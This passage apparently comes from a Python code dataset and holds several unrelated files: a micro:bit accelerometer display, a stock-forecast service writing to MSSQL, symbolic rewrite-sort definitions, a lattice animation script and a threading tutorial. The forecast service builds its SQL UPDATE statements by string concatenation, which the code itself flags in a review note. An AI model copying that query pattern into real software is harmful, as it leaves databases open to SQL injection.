#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%
&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'(
)*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+
,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD
"""
mystr=['leloluoipo','heloluxzipo', 'abcabcbb', 'a','basbarrabas', 'abcdefghijklmnopaqrstuvwxyz',' ', 'au', 'aab', new_str]
for st in mystr[:]:
print(f'For "{st}" the longest substring with no repeated '
f'characters is "{lengthOfLongestSubstring2(st)}"') |
24,191 | 89c0ca79f57472f0ba4dc0f7e62b7b179b8ff0bf | """
Show an acceleration on screen in binary.
Range seems to be -1024 to 1023.
Press A and B to cycle between X, Y and Z accelerations.
"""
from microbit import *
def show_binary(i):
    """
    Display the low 25 bits of *i* on the 5x5 LED matrix.

    Bit 0 lights the top-left pixel; successive bits fill
    left-to-right, then top-to-bottom.
    """
    img = Image(5, 5)
    mask = 1
    for row in range(5):
        for col in range(5):
            img.set_pixel(col, row, 9 if i & mask else 0)
            mask <<= 1
    display.show(img)
# mode selects the axis whose acceleration is shown: 0=x, 1=y, 2=z.
mode = 0
mode_change = True
while True:
    # Update mode.
    if button_a.was_pressed():
        mode -= 1
        mode_change = True
    if button_b.was_pressed():
        mode += 1
        mode_change = True
    if mode_change:
        # Wrap into 0..2 (also handles the -1 from pressing A at mode 0).
        mode %= 3
        if mode == 0:
            val = 'x'
        elif mode == 1:
            val = 'y'
        else:
            val = 'z'
        # Briefly flash the axis letter so the user sees what changed.
        display.show(val)
        sleep(1000)
    # Decide and show value.
    if mode == 0:
        val = accelerometer.get_x()
    elif mode == 1:
        val = accelerometer.get_y()
    else:
        val = accelerometer.get_z()
    show_binary(val)
    mode_change = False
|
24,192 | b49a7927f889d1ec3a7888454d2ab6d410db78e3 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 16 16:26:07 2019
@author: WGP
"""
import xlrd, threading,datetime,os,pymssql,time
#os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
from queue import Queue, Empty
from threading import Thread
import WindTDFAPI as w
from keras import models,backend
import numpy as np
import pandas as pd
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
def calPercentile(xValue, arrPercentile, st=0):
    """
    Map |xValue| onto a percentile in [0, 1] and re-apply its sign.

    *arrPercentile* is an ascending array of 100 percentile thresholds;
    the scan starts at index *st*. If |xValue| exceeds every threshold
    the result saturates at 1 (times the sign of xValue).
    """
    magnitude = abs(xValue)
    result = 1
    for idx in range(st, 100):
        # Small epsilon so values sitting exactly on a threshold match it.
        if magnitude < arrPercentile[idx] + 0.00001:
            result = idx / 100
            break
    return result * np.sign(xValue)
def getNormInduData(xData, pclMatrix):
    """
    Percentile-normalise each component of *xData* against the matching
    column of *pclMatrix* (one 100-entry percentile column per feature).
    """
    dims = len(xData)
    normed = np.zeros(dims)
    for col in range(dims):
        normed[col] = calPercentile(xData[col], pclMatrix[:, col])
    return normed
def btstr(btpara):
    """Decode a UTF-8 byte string to str."""
    return btpara.decode('utf-8')
def myLoss(y_true, y_pred):
    """Keras loss: mean |error| weighted by the magnitude/sign of the truth."""
    # A squared variant was tried and kept here for reference.
    #return backend.mean(backend.square((y_pred - y_true)*y_true), axis=-1)
    return backend.mean(backend.abs((y_pred - y_true)*y_true), axis=-1)
def myMetric(y_true, y_pred):
    """Keras metric: mean of prediction*truth (directional agreement), scaled by 10."""
    return backend.mean(y_pred*y_true, axis=-1)*10
def getCfgFareFactor(ffPath):
    """
    Load cfgForeFactor.csv from *ffPath* and split it into
    (SQL connection parameters, fore-factor config file names).

    The file is read as bytes and decoded via btstr; the first four
    entries are presumably host/user/password/database for MSSQL
    (matches the ``MSSQL(*cfgSQL)`` call in __main__).
    """
    cfgFile=os.path.join(ffPath,'cfgForeFactor.csv')
    cfgData=tuple(map(btstr,np.loadtxt(cfgFile,dtype=bytes)))
    return cfgData[:4],cfgData[4:]
def getTSAvgAmnt(pdAvgAmntFile):
    """
    Populate the global dictTSAvgAmnt from a per-code average-turnover CSV.

    Each daily average is divided over 14400/timeSpan slots, i.e. the
    number of timeSpan-second intervals in a 4-hour trading day.
    """
    global dictTSAvgAmnt,timeSpan
    pdAvgAmnt=pd.read_csv(pdAvgAmntFile,header=0,index_col=0,engine='python')
    for code in pdAvgAmnt.index:
        dictTSAvgAmnt[code]=int(pdAvgAmnt.loc[code][0]/(14400/timeSpan))
def registerAllSymbol():
    """
    Register every symbol referenced by any ForeFactor with the
    market-data vendor.
    """
    global dataVendor,listForeFactor
    # Bug fix: the original initialised ``codelist`` as ``{}`` (a dict);
    # ``dict | set`` raises TypeError, so this function always crashed.
    codelist = set()
    for ff in listForeFactor:
        codelist |= set(ff.dictCodeInfo.keys())
    dataVendor.RegisterSymbol(codelist)
    print('Register symbol, please wait...')
class EventManager:
    """
    Background event dispatcher: events queued via SendEvent are
    delivered one at a time to every handler registered for the
    event's ``type_`` attribute.
    """
    def __init__(self):
        self.__eventQueue = Queue()
        self.__active = False
        self.__thread = Thread(target = self.__Run)
        self.__handlers = {}
    def __Run(self):
        # The 1 s timeout lets the loop periodically re-check __active.
        while self.__active:
            try:
                pending = self.__eventQueue.get(block = True, timeout = 1)
                self.__EventProcess(pending)
            except Empty:
                pass
    def __EventProcess(self, event):
        # Deliver to every handler registered for this event's type.
        for handler in self.__handlers.get(event.type_, ()):
            handler(event)
    def Start(self):
        """Begin draining the queue on the worker thread."""
        self.__active = True
        self.__thread.start()
    def AddEventListener(self, type_, handler):
        """Register *handler* for events of *type_*; duplicates are ignored."""
        registered = self.__handlers.setdefault(type_, [])
        if handler not in registered:
            registered.append(handler)
    def SendEvent(self, event):
        """Queue *event* for asynchronous delivery."""
        self.__eventQueue.put(event)
class MyEvent:
    """Simple event record consumed by EventManager."""
    def __init__(self, Eventtype,Data):
        self.type_ = Eventtype # event type tag used for handler dispatch
        self.data = Data # payload holding the concrete event data
class MSSQL:
    """
    Thin pymssql wrapper that pushes fore-factor forecasts into
    tblFundPricingParam.

    NOTE(review): SQL statements are assembled by string concatenation.
    The inputs come from local config files and model output here, but
    parameterised queries would be safer should strategy names ever
    originate elsewhere.
    """
    def __init__(self,host,user,pwd,db):
        self.host = host
        self.user = user
        self.pwd = pwd
        self.db = db
    def Connect(self):
        """Open an autocommit connection + cursor; True on success, else False."""
        try:
            self.conn = pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset="UTF-8")
            self.conn.autocommit(True)
            self.cur = self.conn.cursor()
            if not self.cur:
                return False
            else:
                return True
        # Broad except keeps the reconnect loop in __main__ simple, but it
        # also hides the underlying connection error.
        except:
            return False
    def UpdateFF(self,sname,pm):
        """Write the three horizon forecasts *pm* for strategy *sname*."""
        sql="update tblFundPricingParam set ff_1m_v=("+str(pm[0])+"),ff_2m_v=("+str(pm[1])+"),ff_3m_v=("+str(pm[2])+") where strategyName='"+sname+"'"
        self.cur.execute(sql)
    def UpdateAllFF(self):
        """Push every ForeFactor's pm values in a single CASE-based UPDATE."""
        global listForeFactor
        listUpdate=[]
        lsn=[]
        # One CASE expression per forecast horizon (1/2/3 minutes).
        for i in range(3):
            listUpdate.append('ff_'+str(i+1)+'m_v=case strategyName')
        for ff in listForeFactor:
            for strategyName in ff.listStrategyName:
                lsn.append('\''+strategyName+'\'')
                for i in range(3):
                    listUpdate[i]+=' when \''+strategyName+'\' then '+str(ff.pm[i])
        for i in range(3):
            listUpdate[i]+=' end'
        sql='update tblFundPricingParam set '+','.join(listUpdate)+' where strategyName in ('+','.join(lsn)+')'
        self.cur.execute(sql)
def TDFCallBack(pMarketdata):
    """Wind TDF tick callback: forward the raw record as a "quote" event."""
    quote = MyEvent("quote", pMarketdata)
    eventManager.SendEvent(quote)
def MyNormData(normEvent):
    """
    "normData" event handler: recompute every ForeFactor's forecast and
    optionally push the values to SQL.

    normEvent.data is a bool: True means also write to the database
    (only inside the continuous-trading windows).
    """
    global listForeFactor,lock,sql
    isPush=normEvent.data
    listPm=[]
    # Wall-clock time as integer HHMMSS for cheap window comparisons.
    intNTime=int(datetime.datetime.now().strftime('%H%M%S'))
    if intNTime<91000 or intNTime>150000:
        print('not trading time.')
        return
    lock.acquire()
    try:
        for ff in listForeFactor:
            ff.CalPM()
            listPm.append(ff.pm)
        print(intNTime,*tuple(listPm))
        # Push only during 09:31-11:30 and 13:01-15:00.
        if isPush and ((intNTime>93100 and intNTime<113000) or (intNTime>130100 and intNTime<150000)):
            sql.UpdateAllFF()
    finally:
        lock.release()
def ReceiveQuote(quoteEvent):
    """
    "quote" event handler: cache the latest tick per wind code in the
    shared dictQuote, guarded by the global lock.
    """
    global dictQuote,lock
    tick = quoteEvent.data
    with lock:
        symbol = bytes.decode(tick.szWindCode)
        # (time in seconds, last price in yuan, cumulative turnover)
        dictQuote[symbol] = (tick.nTime / 1000, tick.nMatch / 10000, tick.iTurnover)
class ForeFactor:
    """
    One forecast model: reads its code/industry config, loads three
    keras models (1/2/3-minute horizons), and turns live quotes into
    the rolling forecast vector ``self.pm``.
    """
    def __init__(self, workPath,cfgFile):
        self.workPath = workPath
        self.cfgFile = cfgFile
        # code -> [weight/shares, industry index] -- TODO confirm semantics
        self.dictCodeInfo = {}
        self.nIndu=0
        self.listModel=[]
        self.listStrategyName=[]
        self.pclMatrix=np.array([])
        #output
        self.lastInduData=np.array([])
        self.inputData=np.array([])
        self.pm=np.zeros(3)
        self._getCfg()
    def _getCfg(self):
        """Read the xls config, load the three models and percentile matrix."""
        global nXData,timeSpan
        data = xlrd.open_workbook(os.path.join(self.workPath,self.cfgFile))
        sheetCodeInfo = data.sheets()[0]
        arrShares = sheetCodeInfo.col_values(1)[1:]
        arrCode = sheetCodeInfo.col_values(0)[1:]
        arrIndustry = sheetCodeInfo.col_values(2)[1:]
        self.nIndu=len(set(arrIndustry))
        # Rolling window: nXData rows x (price-change, turnover) per industry.
        self.inputData=np.zeros((nXData,self.nIndu*2))
        for i in range(len(arrCode)):
            self.dictCodeInfo[arrCode[i]]=[arrShares[i],arrIndustry[i]]
        arrCfg=data.sheets()[1].col_values(1)
        self.listStrategyName=arrCfg[10].split(',')
        (filepath,tempfilename) = os.path.split(self.cfgFile)
        (filename,extension) = os.path.splitext(tempfilename)
        modelPath=os.path.join(self.workPath,filename)
        testP=np.zeros((1,nXData,self.nIndu*2))
        for i in range(3):
            modelfile=os.path.join(modelPath,'model_'+filename+'_1min_'+str(i+1)+'min.h5')
            model=models.load_model(modelfile,custom_objects={'myLoss': myLoss,'myMetric':myMetric})
            # Warm-up predict so the first live call isn't slow.
            model.predict(testP)
            self.listModel.append(model)
        self.pclMatrix=np.loadtxt(os.path.join(modelPath,'pclMatrix_'+filename+'.csv'),delimiter=',')
        getTSAvgAmnt(os.path.join(modelPath,'avgAmnt_'+filename+'.csv'))
    def CalPM(self):
        """Aggregate latest quotes per industry, roll the window, predict pm."""
        global dictQuote,dictTSAvgAmnt,nXData
        crow=np.zeros(self.nIndu*2)
        inputRow=np.zeros(self.nIndu*2)
        npAveTSpanAmnt=np.zeros(self.nIndu)
        for (symbol,weiIndu) in self.dictCodeInfo.items():
            if (symbol not in dictQuote):# or (symbol not in dictTSAvgAmnt):
                #print('np Symbol: '+ symbol)
                #return
                continue
            wei=weiIndu[0]
            # +0.1 guards against float industry indices from xlrd.
            intIndu=int(weiIndu[1]+0.1)
            lpri=dictQuote[symbol][1]
            lamt=dictQuote[symbol][2]
            crow[2*intIndu-2]+=wei*lpri
            crow[2*intIndu-1]+=lamt
            npAveTSpanAmnt[intIndu-1]+=dictTSAvgAmnt[symbol]
            #if lpri<0.01:
            #print('price 0: '+symbol)
            #continue
        # No quotes yet for industry 1 -> nothing meaningful to compute.
        if crow[0]<1:
            print('wait quote')
            return
        if self.lastInduData.size==0:
            self.lastInduData=crow
        for i in range(self.nIndu):
            # Price change in basis points; turnover delta normalised by
            # the industry's average per-time-span turnover.
            inputRow[2*i]=(crow[2*i]/self.lastInduData[2*i]-1)*10000
            inputRow[2*i+1]=(crow[2*i+1]-self.lastInduData[2*i+1])/npAveTSpanAmnt[i]
        inputRow=getNormInduData(inputRow,self.pclMatrix)
        self.inputData=np.vstack((self.inputData[1:,:],inputRow))
        self.lastInduData=crow
        for i in range(3):
            self.pm[i]=self.listModel[i].predict(self.inputData.reshape(1,nXData,self.nIndu*2))[0,0]
        #backend.clear_session()
        self.pm=np.round(self.pm,2)
if __name__ == '__main__':
    #global state shared by the event handlers above
    eventManager = EventManager()
    lock = threading.Lock()
    listForeFactor=[]
    dictQuote={}
    dictTSAvgAmnt={}
    timeSpan=3
    nXData=20
    #config: primary path with a fallback for the dev machine
    cfgPath='D:\\CalForeFactor\\HFI_Model'
    if not os.path.exists(cfgPath):
        cfgPath='C:\\Users\\WAP\\Documents\\HFI_Model'
    cfgSQL,listCfgForeFactor=getCfgFareFactor(cfgPath)
    fPath=os.path.join(cfgPath,'cfg')
    for cfgFF in listCfgForeFactor:
        listForeFactor.append(ForeFactor(fPath,cfgFF))
    #SQL: retry until the database accepts the connection
    sql=MSSQL(*cfgSQL)
    nConnect=0
    while not sql.Connect():
        print('SQL Connet Error: ',nConnect)
        nConnect+=1
        time.sleep(5)
    #Event wiring and market-data vendor start-up
    eventManager.AddEventListener("quote",ReceiveQuote)
    eventManager.AddEventListener("normData",MyNormData)
    eventManager.Start()
    w.SetMarketDataCallBack(TDFCallBack)
    dataVendor = w.WindMarketVendor("TDFConfig.ini", "TDFAPI25.dll")
    nConnect=0
    while (dataVendor.Reconnect() is False):
        print("Error nConnect: ",nConnect)
        nConnect+=1
        time.sleep(5)
    dataVendor.RegisterSymbol(set(dictTSAvgAmnt.keys()))
    time.sleep(10)
    # Warm-up phase: compute forecasts without pushing to SQL.
    for i in range(30):
        eventManager.SendEvent(MyEvent("normData",False))
        time.sleep(timeSpan)
    # Steady state: compute and (inside trading windows) push forecasts.
    while True:
        eventManager.SendEvent(MyEvent("normData",True))
        time.sleep(timeSpan)
|
24,193 | 0ceaf274327e33453ea093d48c5f960cfb51962e | """
Allows you to define sorts inductively.
In other words, constants and functions
under a sort class will have the sort
name associated with it.
"""
from copy import deepcopy
from typing import Dict, List, Optional
import functools
from symcollab.algebra import Constant, Function, FuncTerm, Sort, Term
from symcollab.rewrite import normal, RewriteRule, RewriteSystem
__all__ = ['Inductive', 'TheorySystem', 'system_from_sort']
class TheorySystem:
    """
    Contains a sort and the RewriteSystem that governs it.

    NOTE(review): ``rules`` and ``definitions`` are mutable class-level
    attributes shared with subclasses until the ``Inductive`` decorator
    deep-copies them -- apply the decorator to every subclass.
    """
    sort: Sort = None
    rules: RewriteSystem = RewriteSystem()
    definitions: Dict[Function, RewriteSystem] = dict()
    @classmethod
    def simplify(cls, x: Term, bound: int = -1) -> Optional[Term]:
        """
        Simplify a term using the convergent
        rewrite rules known.
        """
        if not isinstance(x, FuncTerm):
            raise ValueError("simplify function expects a FuncTerm.")
        return normal(x, cls.rules, bound)[0]
    @classmethod
    def signature(cls) -> List[Term]:
        """List the signature (constants and functions) of the system."""
        el = []
        for term in cls.__dict__.values():
            if not isinstance(term, (Constant, Function)):
                continue
            el.append(deepcopy(term))
        return el
    @classmethod
    def __len__(cls) -> int:
        """Return the number of constant elements in the system."""
        # Bug fix: the original ``len(filter(lambda ...)), cls.__dict__.values())``
        # called filter with one argument and len with two -> TypeError.
        return sum(1 for x in cls.__dict__.values() if isinstance(x, Constant))
    @classmethod
    def add_rule(cls, rule: RewriteRule) -> None:
        """Add a rule to the system."""
        if not isinstance(rule, RewriteRule):
            raise ValueError(f"add_rule expected a RewriteRule not a '{type(rule)}'.")
        cls.rules.append(rule)
    @classmethod
    def define(cls, function: Function, rules: RewriteSystem):
        """Define a function by a rewrite system."""
        setattr(cls, function.symbol, function)
        # TODO: Make sure RewriteSystem terminates
        # TODO: Does composition of terminating rewrite systems terminate?
        for rule in rules:
            cls.add_rule(rule)
        cls.definitions[function] = rules
def Inductive(cls=None):
    """
    Decorator that takes a TheorySystem subclass and stamps a Sort named
    after the class onto every Constant and Function it defines.

    Usable bare (``@Inductive``) or called (``Inductive(SomeClass)``).

    Raises
    ------
    ValueError
        If applied to a non-TheorySystem class, if a member already
        carries a conflicting sort, or if a member is neither a
        Constant nor a Function.
    """
    if cls is not None and not issubclass(cls, TheorySystem):
        raise ValueError(
            "Inductive decorator only works \
            on classes that inherit TheorySystem."
        )
    @functools.wraps(cls)
    def wrap(cls):
        cls.sort = Sort(cls.__name__)
        # Deep-copy so subclasses do not mutate the shared class-level
        # rules/definitions of TheorySystem (or of one another).
        cls.rules = deepcopy(cls.rules)
        cls.definitions = deepcopy(cls.definitions)
        for name, term in cls.__dict__.items():
            # Ignore private, already defined, and custom methods.
            # NOTE(review): ``'_' in name`` also skips public names that
            # merely contain an underscore -- confirm this is intended.
            if '_' in name \
               or name in TheorySystem.__dict__ \
               or (callable(term) and not isinstance(term, Function)):
                continue
            if isinstance(term, Constant):
                if term.sort is not None and term.sort != cls.sort:
                    # Bug fix: the original message referenced the undefined
                    # name ``class_sort`` (NameError); report cls.sort.
                    raise ValueError(
                        f"Constant {term} is of sort '{term.sort}' \
                        which is not the class name '{cls.sort}'."
                    )
                setattr(
                    cls,
                    name,
                    Constant(term.symbol, sort=cls.sort)
                )
            elif isinstance(term, Function):
                if term.domain_sort is not None and term.domain_sort != cls.sort:
                    # Bug fix: same undefined ``class_sort`` reference.
                    raise ValueError(
                        f"Function {term} has the domain sort \
                        set to '{term.domain_sort}' \
                        which is not the class name '{cls.sort}'."
                    )
                range_sort = cls.sort if term.range_sort is None else term.range_sort
                setattr(
                    cls,
                    name,
                    Function(
                        term.symbol,
                        term.arity,
                        domain_sort=cls.sort,
                        range_sort=range_sort
                    )
                )
            else:
                raise ValueError(
                    f"Variable '{name}' is of invalid type \
                    '{type(term)}' inside an inductive class. (Constant, Function)"
                )
        # Register the class so system_from_sort can find it later.
        _system_sort_map[cls.sort] = cls
        return cls
    # Called as decorator
    if cls is None:
        return wrap
    # Called as function
    return wrap(cls)
_system_sort_map: Dict[Sort, TheorySystem] = dict()
def system_from_sort(s: Sort) -> Optional[TheorySystem]:
    """Look up the TheorySystem registered for sort *s* (None if absent)."""
    try:
        return _system_sort_map[s]
    except KeyError:
        return None
|
24,194 | 20330c6d4d43e63d902611aaf4680182a02111fd | in_str = 'Hello dear sir Adolfer Tannenbaum'
# Print the words of in_str in reverse order.
out_str = ' '.join(in_str.split()[::-1])
print(out_str)
|
24,195 | f3c1620cc45ae7948f0c23cea2ed0ac88907ce39 | import numpy as np
import matplotlib.pyplot as plt
import os
import rpmClass_Stable as rpm
import pandas as pd
import time
import matplotlib.cm as cm
from importlib import reload
reload(rpm)
from matplotlib.animation import FuncAnimation, FFMpegWriter
# Some global variables to define the whole run
total_number_of_frames = 100
total_width_of_sine_wave = 2 * np.pi
all_x_data = np.linspace(0, total_width_of_sine_wave, total_number_of_frames)
all_y_data = np.sin(all_x_data)
start = time.time()
def animate(frame, line):
    """
    FuncAnimation callback: reveal the sine curve up to and including
    the *frame*'th sample by updating *line*'s data in place.
    """
    # Stolen from module scope (declared to document the dependency).
    global all_x_data, all_y_data
    upto = frame + 1
    line.set_xdata(all_x_data[:upto])
    line.set_ydata(all_y_data[:upto])
    # FuncAnimation expects an iterable of updated artists.
    return (line,)
'''
folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
#filenames = os.listdir(folder)
filenames = []
for f in os.listdir(folder):
if f.endswith(".npz"):
filenames.append(os.path.join(folder, f))
filenames.sort(key=lambda s: os.path.getmtime(s))
print(filenames)
L = rpm.ASI_RPM(1,1)
L.load(filenames[0])
lattice_update = L.returnLattice()
X = lattice_update[:,:,0]
Y = lattice_update[:,:,1]
Mx = lattice_update[:,:,3]
My = lattice_update[:,:,4]
fig, ax = plt.subplots(1,1)
lattice = ax.quiver(X, Y, Mx, My,Mx+My, pivot ='mid')
LHistory = pd.read_csv(os.path.join(folder, 'LatticeHistory.csv'), header = None)
print(LHistory)
xpos_flip = [x for x in LHistory[9].values if x != -1]
ypos_flip = [x for x in LHistory[10].values if x != -1]
print(xpos_flip, ypos_flip)
'''
def animateSSF(frame, lattice1, L, xpos_flip, ypos_flip):
    """
    Animation callback for a single-spin-flip sequence: flip the
    *frame*'th recorded spin on lattice *L*, recompute vertex charges,
    and refresh the quiver *lattice1* with the new moments.
    """
    xpos = xpos_flip[frame]
    ypos = ypos_flip[frame]
    #print(xpos, ypos)
    L.flipSpin(int(xpos), int(ypos))
    L.vertexCharge2()
    L_update = L.returnLattice()
    # Lattice slices 3/4 hold the moment components -- see makeAnimation.
    Mx = L_update[:,:,3]
    My = L_update[:,:,4]
    #Mx[np.where(L_update[:,:,6]==0)] = np.nan
    #My[np.where(L_update[:,:,6]==0)] = np.nan
    lattice1.set_UVC(Mx, My, Mx+My)
    # Disabled experimentation with a second (monopole scatter) artist.
    #X = L_update[:,:,0]
    #Y = L_update[:,:,1]
    #Charge = L_update[:,:, 8].flatten()
    #print(np.shape((X, Y)))
    #lattice2.set_offsets((X, Y))
    #print
    #lattice2.set_array(Charge)
    return(lattice1)
def animateRPM(frame, lattice, filename):
    """
    Animation callback: load the *frame*'th saved lattice state from
    *filename* (a list of .npz paths) and refresh the artist *lattice*
    (moments, positions and vertex-charge colouring).

    Relies on the module-level ``L`` (an rpm.ASI_RPM instance).
    """
    L.load(filename[frame])
    lattice_update = L.returnLattice()
    X = lattice_update[:,:,0].flatten()
    Y = lattice_update[:,:,1].flatten()
    Mx = lattice_update[:,:,3].flatten()
    My = lattice_update[:,:,4].flatten()
    Hc = lattice_update[:,:,6].flatten()
    Charge = lattice_update[:,:, 8].flatten()
    # Bug fix: the original masked X with Hc before either was assigned
    # (NameError). Mask zero-coercivity (empty) sites after loading.
    X[np.where(Hc==0)] = -1
    lattice.set_UVC(Mx, My, Mx+My)
    # Bug fix: set_offsets expects an (N, 2) array of points; the original
    # np.vstack((X, Y)) produced a (2, N) array.
    lattice.set_offsets(np.column_stack((X, Y)))
    lattice.set_array(Charge)
    return lattice,
def estimateTime(frames):
    """Print a rough mp4-export time estimate (in minutes) for *frames* frames."""
    # Empirical linear model: ~0.111 s per frame plus fixed overhead.
    seconds = frames*0.11143+0.83739
    print('Estimated time to export to mp4: ', seconds/60, ' minutes')
def animateMono(frame, monopoles, L, xpos_flip, ypos_flip):
    """
    Animation callback: recompute vertex charges on *L* and refresh the
    *monopoles* scatter artist (positions + charge colouring).

    NOTE(review): charges are recomputed after returnLattice(); this
    assumes returnLattice() hands back a live reference -- confirm.
    """
    lattice_update = L.returnLattice()
    L.vertexCharge2()
    X = lattice_update[:,:,0].flatten()
    Y = lattice_update[:,:,1].flatten()
    Charge = lattice_update[:,:, 8].flatten()
    # Bug fix: set_offsets needs an (N, 2) array of points; the original
    # np.hstack((X, Y)) produced a flat length-2N vector.
    monopoles.set_offsets(np.column_stack((X, Y)))
    monopoles.set_array(Charge)
    return monopoles,
'''
folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
#filenames = os.listdir(folder)
print(len(xpos_flip))
estimateTime(len(xpos_flip))
fig.tight_layout()
anim =FuncAnimation(fig, animateSSF,frames = 1, fargs=(lattice,L, xpos_flip, ypos_flip),
interval=40, blit=False, repeat = False) #len(folder)
writer = FFMpegWriter(fps=25, bitrate=None)
anim.save(os.path.join(folder,"out_funcanimationSSF_2.mp4"), writer = writer)
plt.close('all')
end = time.time()
print(end-start)
'''
def makeAnimation(folder):
    """
    Build an mp4 movie of the single-spin-flip sequence stored in
    *folder*: load the initial .npz lattice state, replay the flips
    listed in LatticeHistory.csv, and save the animation.
    """
    start = time.time()
    print('Exporting to mp4 started: ', time.localtime(start))
    #folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
    #filenames = os.listdir(folder)
    # Collect the saved lattice snapshots, oldest first.
    filenames = []
    for f in os.listdir(folder):
        if f.endswith(".npz"):
            filenames.append(os.path.join(folder, f))
    filenames.sort(key=lambda s: os.path.getmtime(s))
    print(filenames)
    L = rpm.ASI_RPM(1,1)
    L.load(filenames[0])
    lattice_update = L.returnLattice()
    # Lattice slices: 0/1 positions, 3/4 moments, 6 coercivity, 8 charge.
    X = lattice_update[:,:,0].flatten()
    Y = lattice_update[:,:,1].flatten()
    Mx = lattice_update[:,:,3].flatten()
    My = lattice_update[:,:,4].flatten()
    Charge = lattice_update[:,:,8].flatten()
    Hc = lattice_update[:,:,6].flatten()
    # Park zero-coercivity (empty) sites off to the side of the plot.
    X[np.where(Hc==0)] = -1
    fig, ax = plt.subplots(1,1)
    plt.set_cmap(cm.jet)
    lattice1 = ax.quiver(X, Y, Mx, My,Mx+My, pivot ='mid', cmap ='bwr', zorder = 1)
    ax.set_xlim([-1*L.returnUCLen(), np.max(X)+L.returnUCLen()])
    # NOTE(review): ylim also uses np.max(X) -- fine only for square
    # lattices; confirm intended.
    ax.set_ylim([-1*L.returnUCLen(), np.max(X)+L.returnUCLen()])
    #lattice2 = ax.scatter(X, Y, s=25,c=Charge, marker = 'o', zorder=2, vmax = 1, vmin = -1, cmap = 'RdBu')
    LHistory = pd.read_csv(os.path.join(folder, 'LatticeHistory.csv'), header = None)
    #print(LHistory)
    # Columns 9/10 hold the flipped-spin coordinates; -1 means "no flip".
    xpos_flip = [x for x in LHistory[9].values if x != -1]
    ypos_flip = [x for x in LHistory[10].values if x != -1]
    estimateTime(len(ypos_flip))
    fig.tight_layout()
    plt.tick_params(
        axis='x',          # changes apply to the x-axis
        which='both',      # both major and minor ticks are affected
        bottom=False,      # ticks along the bottom edge are off
        top=False,         # ticks along the top edge are off
        labelbottom=False) # labels along the bottom edge are off
    plt.tick_params(
        axis='y',          # changes apply to the y-axis
        which='both',      # both major and minor ticks are affected
        left=False,        # ticks along the left edge are off
        right=False,       # ticks along the right edge are off
        labelleft=False)   # labels along the left edge are off
    anim = FuncAnimation(fig, animateSSF,frames = len(xpos_flip), fargs=(lattice1,L, xpos_flip, ypos_flip),
                              interval=40, blit=False, repeat = False) #len(folder)
    #anim = FuncAnimation(fig, animateMono, frames = 10, fargs = (lattice,L, xpos_flip, ypos_flip),
    #    interval = 40, blit = False, repeat = False)
    writer = FFMpegWriter(fps=25, bitrate=None)
    outfolder = r'D:\RPM_Rapid\SquareQDvHapp2\Movies'
    #D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.000000e-01_count1
    # Derive the movie name from the run-folder name (fixed-prefix slice).
    savename = folder[28:]
    anim.save(os.path.join(outfolder,savename+".mp4"), writer = writer)
    plt.close('all')
    end = time.time()
    print('How long it took: ', end-start)
#print(xpos_flip, ypos_flip)
makeAnimation('D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD5.000000e-02_Happ1.200000e-01_count19')
'''
testfolder = r'D:\RPM_Rapid\SquareQDvHapp2'
for directory in os.listdir(testfolder):
if 'count2' in directory and 'Progression' not in directory:
folder = os.path.join(testfolder,directory)
print(folder)
makeAnimation(folder)
'''
'''
fig.tight_layout()
anim =FuncAnimation(fig, animateRPM,frames = len(filenames), fargs=(lattice, filenames),
interval=1000, blit=False, repeat = False)
anim.save(os.path.join(folder,"out_funcanimation3.mp4"))
plt.close('all')
'''
'''
# Now we can do the plotting!
fig, ax = plt.subplots(1)
# Initialise our line
line, = ax.plot([0], [0])
# Have to set these otherwise we will get one ugly plot!
ax.set_xlim(0, total_width_of_sine_wave)
ax.set_ylim(-1.2, 1.2)
ax.set_xlabel("$x$")
ax.set_ylabel("$\sin(x)$")
# Make me pretty
fig.tight_layout()
animation = FuncAnimation(
# Your Matplotlib Figure object
fig,
# The function that does the updating of the Figure
animate,
# Frame information (here just frame number)
np.arange(total_number_of_frames),
# Extra arguments to the animate function
fargs=[line],
# Frame-time in ms; i.e. for a given frame-rate x, 1000/x
interval=1000 / 25
)
folder = os.getcwd()
animation.save(os.path.join(folder,"out_funcanimation.mp4"))
''' |
24,196 | de1351af53b03b8c28db4172dad76f17529cb686 | #Synchronizing Threads
''' The threading module provided with Python includes a simple-to-implement locking
mechanism that allows you to synchronize threads. A new lock includes
created by calling the Lock() method,which returns the new clock.
The acquire(blocking) method of the new lock object is
used to force the threads to run synchronously. The optional
blocking parameter enables you to control whether the thread waits to
acquire the lock.
If blocking is set to 0, the thread returns immediately with a 0 value if the lock
cannot be acquired and with a 1 if the lock was acquired. If blocking is set to 1,
the thread blocks and wait for the lock to be released.
The release() method of the new lock object is used to release the lock when it is no longer
required.
'''
import threading
import time
class myThread(threading.Thread):
    """Worker thread that prints timestamps while holding a shared lock.

    ``run`` acquires the module-level ``threadLock`` before calling
    ``print_time``, so the worker threads execute their printing one
    at a time instead of interleaving.
    """

    def __init__(self, threadID, name, counter):
        super().__init__()
        self.threadID = threadID
        self.name = name          # also sets the Thread's display name
        self.counter = counter    # sleep delay passed on to print_time

    def run(self):
        banner = "Starting " + self.name
        print(banner)
        # Serialize the printing section across all worker threads.
        threadLock.acquire()
        print_time(self.name, self.counter, 3)
        # Let the next waiting thread proceed.
        threadLock.release()
def print_time(threadName, delay, counter):
    """Print the wall-clock time ``counter`` times for ``threadName``.

    Before each line is printed the function sleeps ``delay`` seconds,
